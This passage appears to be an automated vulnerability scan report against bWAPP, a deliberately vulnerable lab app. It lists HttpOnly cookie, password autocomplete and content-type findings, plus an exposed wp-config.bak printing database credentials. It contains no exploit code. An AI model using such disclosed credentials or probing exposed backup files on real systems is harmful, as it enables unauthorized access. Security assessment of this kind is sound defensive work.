    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Set-Cookie: PHPSESSID=b4570c0b456cf209ada94dab54eb7626; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: login.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    13.16. http://192.168.52.147/bWAPP/insecure_crypt_storage_3.php
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/insecure_crypt_storage_3.php

    Issue detail

    The following cookie was issued by the application and does not have the HttpOnly flag set:
    • secret
    The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

    Request 1

    GET /bWAPP/insecure_crypt_storage_3.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/ssii.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:54:40 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Set-Cookie: secret=QW55IGJ1Z3M%2F; expires=Fri, 09-Mar-2018 03:54:40 GMT; path=/
    Connection: close
    Content-Type: text/html
    Content-Length: 12772

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    13.17. http://192.168.52.147/bWAPP/xss_stored_2.php
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/xss_stored_2.php

    Issue detail

    The following cookie was issued by the application and does not have the HttpOnly flag set:
    • movie_genre
    The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

    Request 1

    GET /bWAPP/xss_stored_2.php?genre=horror&form=like HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/xss_stored_2.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:28 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Set-Cookie: movie_genre=horror; expires=Fri, 09-Mar-2018 03:57:28 GMT; path=/
    Connection: close
    Content-Type: text/html
    Content-Length: 13401

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    14. Password field with autocomplete enabled
    Previous  Next

    There are 8 instances of this issue:

    Issue background

    Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications that employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

    The stored credentials can be captured by an attacker who gains control over the user's computer. Further, an attacker who finds a separate application vulnerability such as cross-site scripting may be able to exploit this to retrieve a user's browser-stored credentials.

    Vulnerability classifications



    14.1. http://192.168.52.147/bWAPP/ba_insecure_login_2.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/ba_insecure_login_2.php

    Issue detail

    The page contains a form with the following action URL:
    • http://192.168.52.147/bWAPP/ba_insecure_login_2.php
    The form contains the following password field with autocomplete enabled:
    • passphrase

    Request 1

    GET /bWAPP/ba_insecure_login_2.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/ba_insecure_login.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 15303

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    </p>

    <form>

    <p>
    ...[SNIP]...
    <br />
    <input type="password" id="passphrase" name="passphrase" size="20" /></p>
    ...[SNIP]...
    14.2. http://192.168.52.147/bWAPP/http_verb_tampering.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/http_verb_tampering.php

    Issue detail

    The page contains a form with the following action URL:
    • http://192.168.52.147/bWAPP/http_verb_tampering.php
    The form contains the following password fields with autocomplete enabled:
    • password_new
    • password_conf

    Request 1

    GET /bWAPP/http_verb_tampering.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/unrestricted_file_upload.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0; secret=QW55IGJ1Z3M%2F
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:55:31 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13382

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    </p>

    <form action="/bWAPP/http_verb_tampering.php" method="POST">

    <p>
    ...[SNIP]...
    <br />
    <input type="password" id="password_new" name="password_new"></p>
    ...[SNIP]...
    <br />
    <input type="password" id="password_conf" name="password_conf"></p>
    ...[SNIP]...
    14.3. http://192.168.52.147/bWAPP/insecure_crypt_storage_2.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/insecure_crypt_storage_2.php

    Issue detail

    The page contains a form with the following action URL:
    • http://192.168.52.147/bWAPP/insecure_crypt_storage_2.php
    The form contains the following password field with autocomplete enabled:
    • password

    Request 1

    GET /bWAPP/insecure_crypt_storage_2.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13259

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Arc
    ...[SNIP]...
    </p>

    <form action="/bWAPP/insecure_crypt_storage_2.php" method="POST">

    <p>
    ...[SNIP]...
    <br />
    <input type="password" id="password" name="password"></p>
    ...[SNIP]...
    14.4. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_1.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/insuff_transp_layer_protect_1.php

    Issue detail

    The page contains a form with the following action URL:
    • https://192.168.52.147/bWAPP/insuff_transp_layer_protect_1.php
    The form contains the following password field with autocomplete enabled:
    • password

    Request 1

    GET /bWAPP/insuff_transp_layer_protect_1.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13263

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    </p>

    <form action="https://192.168.52.147/bWAPP/insuff_transp_layer_protect_1.php" method="POST">

    <p>
    ...[SNIP]...
    <br />
    <input type="password" id="password" name="password" size="20" /></p>
    ...[SNIP]...
    14.5. http://192.168.52.147/bWAPP/password_change.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/password_change.php

    Issue detail

    The page contains a form with the following action URL:
    • http://192.168.52.147/bWAPP/password_change.php
    The form contains the following password fields with autocomplete enabled:
    • password_curr
    • password_new
    • password_conf

    Request 1

    GET /bWAPP/password_change.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/portal.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: 192.168.52.147
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0; secret=QW55IGJ1Z3M%2F
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 03:21:08 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13561

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    </p>

    <form action="/bWAPP/password_change.php" method="POST">

    <p>
    ...[SNIP]...
    <br />
    <input type="password" id="password_curr" name="password_curr"></p>
    ...[SNIP]...
    <br />
    <input type="password" id="password_new" name="password_new"></p>
    ...[SNIP]...
    <br />
    <input type="password" id="password_conf" name="password_conf"></p>
    ...[SNIP]...
    14.6. http://192.168.52.147/bWAPP/sm_mitm_1.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/sm_mitm_1.php

    Issue detail

    The page contains a form with the following action URL:
    • https://192.168.52.147/bWAPP/sm_mitm_1.php
    The form contains the following password field with autocomplete enabled:
    • password

    Request 1

    GET /bWAPP/sm_mitm_1.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13448

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    </p>

    <form action="https://192.168.52.147/bWAPP/sm_mitm_1.php" method="POST">

    <p>
    ...[SNIP]...
    <br />
    <input type="password" id="password" name="password" size="20" /></p>
    ...[SNIP]...
    14.7. http://192.168.52.147/bWAPP/user_extra.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/user_extra.php

    Issue detail

    The page contains a form with the following action URL:
    • http://192.168.52.147/bWAPP/user_extra.php
    The form contains the following password fields with autocomplete enabled:
    • password
    • password_conf

    Request 1

    GET /bWAPP/user_extra.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/portal.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: 192.168.52.147
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0; secret=QW55IGJ1Z3M%2F
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 03:21:21 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13910

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    </p>

    <form action="/bWAPP/user_extra.php" method="POST">

    <table>
    ...[SNIP]...
    <br />
    <input type="password" id="password" name="password"></p>
    ...[SNIP]...
    <br />
    <input type="password" id="password_conf" name="password_conf"></p>
    ...[SNIP]...
    14.8. http://192.168.52.147/bWAPP/user_new.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/user_new.php

    Issue detail

    The page contains a form with the following action URL:
    • http://192.168.52.147/bWAPP/user_new.php
    The form contains the following password fields with autocomplete enabled:
    • password
    • password_conf

    Request 1

    GET /bWAPP/user_new.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/login.php
    Cookie: security_level=1; PHPSESSID=b2652a9585941cebb6cfa2a30b13c119

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:17 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Content-Length: 3417
    Connection: close
    Content-Type: text/html

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    </p>

    <form action="/bWAPP/user_new.php" method="POST">

    <table>
    ...[SNIP]...
    <br />
    <input type="password" id="password" name="password"></p>
    ...[SNIP]...
    <br />
    <input type="password" id="password_conf" name="password_conf"></p>
    ...[SNIP]...
    15. Source code disclosure
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Tentative
    Host:   http://192.168.52.147
    Path:   /bWAPP/passwords/wp-config.bak

    Issue detail

    The application appears to disclose some server-side source code written in PHP.

    Issue background

    Source code intended to be kept server-side can sometimes end up being disclosed to users. Such code may contain sensitive information such as database passwords and secret keys, which may help malicious users formulate attacks against the application.

    Vulnerability classifications

    Request 1

    GET /bWAPP/passwords/wp-config.bak HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/passwords/?C=N;O=D
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:29 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce016-603-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 1539
    Connection: close
    Content-Type: application/x-trash

    <?php
    // ** MySQL settings ** //
    define('DB_NAME', 'bWAPP'); // The name of the database
    define('DB_USER', 'thor'); // Your MySQL username
    define('DB_PASSWORD', 'Asgard'); // ...and password
    define('DB_HOST', 'localhost'); // 99% chance you won't need to change this value
    define('DB_CHARSET', 'utf8');
    define('DB_COLLATE', '');

    // Change each KEY to a different unique phrase. You won't have to remember the phrases later,
    // so make them long and complicated. You can visit http://api.wordpress.org/secret-key/1.1/
    // to get keys generated for you, or just make something up. Each key should have a different phrase.
    define('AUTH_KEY', 'put your unique phrase here'); // Change this to a unique phrase.
    define('SECURE_AUTH_KEY', 'put your unique phrase here'); // Change this to a unique phrase.
    define('LOGGED_IN_KEY', 'put your unique phrase here'); // Change this to a unique phrase.

    // You can have multiple installations in one database if you give each a unique prefix
    $table_prefix = 'wp_'; // Only numbers, letters, and underscores please!

    // Change this to localize WordPress. A corresponding MO file for the
    // chosen language must be installed to wp-content/languages.
    // For example, install de.mo to wp-content/languages and set WPLANG to 'de'
    // to enable German language support.
    define ('WPLANG', '');

    /* That's all, stop editing! Happy blogging. */

    if ( !defined('ABSPATH') )
       define('ABSPATH', dirname(__FILE__) . '/');
    require_once(ABSPATH . 'wp-settings.php');
    ?>

    16. Content type incorrectly stated
    Previous  Next

    There are 8 instances of this issue:

    Issue background

    If a response specifies an incorrect content type then browsers may process the response in unexpected ways. If the content type is specified to be a renderable text-based format, then the browser will usually attempt to interpret the response as being in that format, regardless of the actual contents of the response. Additionally, some other specified content types might sometimes be interpreted as HTML due to quirks in particular browsers. This behavior might lead to otherwise "safe" content such as images being rendered as HTML, enabling cross-site scripting attacks in certain conditions.

    The presence of an incorrect content type statement typically only constitutes a security flaw when the affected resource is dynamically generated, uploaded by a user, or otherwise contains user input. You should review the contents of affected responses, and the context in which they appear, to determine whether any vulnerability exists.

    Vulnerability classifications



    16.1. http://192.168.52.147/bWAPP/fonts/arial.ttf
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/fonts/arial.ttf

    Issue detail

    The response states that the content type is text/plain. However, it actually appears to contain unrecognized content.

    The following browsers may interpret the response as HTML:
    • Internet Explorer 11 (Compatibility Mode)

    Request 1

    GET /bWAPP/fonts/arial.ttf HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/fonts/
    Cookie: security_level=1; PHPSESSID=b2652a9585941cebb6cfa2a30b13c119

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce062-bc860-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 772192
    Connection: close
    Content-Type: text/plain

    ............DSIG.7.Y.......|GDEF...I.
    .L....GPOS{V...
    ......GSUB.B`Q...,....JSTFm*i.........LTSHCLc...7...\OS/2.2]s.......`PCLT.{>C.
    .....6VDMXP.j...E$....cmap..WU...`.."^cvt ...........Tfpgm.yY.....
    ...[SNIP]...
    16.2. http://192.168.52.147/bWAPP/fonts/arialbd.ttf
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/fonts/arialbd.ttf

    Issue detail

    The response states that the content type is text/plain. However, it actually appears to contain unrecognized content.

    The following browsers may interpret the response as HTML:
    • Internet Explorer 11 (Compatibility Mode)

    Request 1

    GET /bWAPP/fonts/arialbd.ttf HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/fonts/
    Cookie: security_level=1; PHPSESSID=b2652a9585941cebb6cfa2a30b13c119

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce065-b6cb0-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 748720
    Connection: close
    Content-Type: text/plain

    ............DSIG..[...U4...|GDEF...I.
    ......GPOS.....
    ......GSUB..X%..9x....JSTFm*i...U.....LTSH...x..7...\OS/2.]^........`PCLT..AG.
    .....6VDMXV.p..E$....cmap..WU...`.."^cvt .>.....l...Zfpgm...(....
    ...[SNIP]...
    16.3. http://192.168.52.147/bWAPP/fonts/arialbi.ttf
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/fonts/arialbi.ttf

    Issue detail

    The response states that the content type is text/plain. However, it actually appears to contain unrecognized content.

    The following browsers may interpret the response as HTML:
    • Internet Explorer 11 (Compatibility Mode)

    Request 1

    GET /bWAPP/fonts/arialbi.ttf HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/fonts/
    Cookie: security_level=1; PHPSESSID=b2652a9585941cebb6cfa2a30b13c119

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce066-891d0-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 561616
    Connection: close
    Content-Type: text/plain

    ...........pDSIGOD.K..zT...|GDEF............GPOS`...........GSUB......n.....LTSH.c....*4..    .OS/2..........`PCLTs.A........6VDMXU4o...40....cmap.`h...5l...Bcvt Tegf..c.....fpgmI.-G..P.....gasp...    ....
    ...[SNIP]...
    16.4. http://192.168.52.147/bWAPP/fonts/ariali.ttf
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/fonts/ariali.ttf

    Issue detail

    The response states that the content type is text/plain. However, it actually appears to contain unrecognized content.

    The following browsers may interpret the response as HTML:
    • Internet Explorer 11 (Compatibility Mode)

    Request 1

    GET /bWAPP/fonts/ariali.ttf HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/fonts/
    Cookie: security_level=1; PHPSESSID=4232bd2c1ff619c19b04a9254d90273a

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce05f-87a44-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 555588
    Connection: close
    Content-Type: text/plain

    ...........pDSIGP//...b....|GDEF............GPOS..,s.......jGSUB......W(....LTSH`TO...*4..    .OS/2..}........`PCLT&.>D.......6VDMXPj...40....cmap.`h...5l...Bcvt =.(7..](...`fpgmT.m6..P.....gasp...    ...|
    ...[SNIP]...
    16.5. http://192.168.52.147/bWAPP/fonts/ariblk.ttf
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/fonts/ariblk.ttf

    Issue detail

    The response states that the content type is text/plain. However, it actually appears to contain unrecognized content.

    The following browsers may interpret the response as HTML:
    • Internet Explorer 11 (Compatibility Mode)

    Request 1

    GET /bWAPP/fonts/ariblk.ttf HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
